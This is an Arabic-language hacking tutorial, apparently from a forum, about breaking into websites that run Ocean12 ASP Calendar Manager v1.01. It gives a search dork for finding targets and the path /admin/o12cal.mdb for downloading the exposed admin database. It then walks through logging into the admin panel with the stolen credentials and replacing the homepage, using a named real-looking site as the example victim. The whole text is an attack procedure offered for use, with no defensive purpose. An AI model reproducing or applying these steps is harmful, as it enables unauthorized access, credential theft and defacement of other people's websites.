كود البحث: Maintained with the Ocean12 ASP Calendar Manager v1.01
Calendar سوف يأتي لك العديد من المواقع تنتهي بـ بعض المواقع بداخلها ثغرة على الأغلب Calendarمثال على موقع ينتهي بـ http://www.naplesgu itarist.com/ aspeventcalendar /: admin/o12cal.mdb
اذا حملت قاعدة البيانات طلع اليوزر والباسوورد حقت الادمن
بعدين احذف
o12cal.mdb
راح يطلب منك تسجيل الدخول الى لوحة التحكم وحط اليوزر والباس الي طلعتهم
وهنالك توضيح بالفيديو لإختراق المواقع عن طريق كالندر حملو و راح تستفيد قبل ما تنتهي صلاحية رابط التحميل الان نكتب رمز الثغرة يصبح المواقع هكذا http://www.naplesgu itarist.com/ aspeventcalendar /admin/o12cal. mdb
اي ندخل بعد كالندر هذه العبارة /admin/o12cal.mdb نضغط على الرابط و نحمل قاعدة بيانات فيها بيانات الإدارة ثم نضغط على هذا الموقع و ندخل بيانات اسم المستخدم و كلمة المرور http://www.naplesgu itarist.com/ aspeventcalendar /admin/
و بعد هيك عدل على كيفك و حط الي بدي اياه و غير الصفحة الرئيسية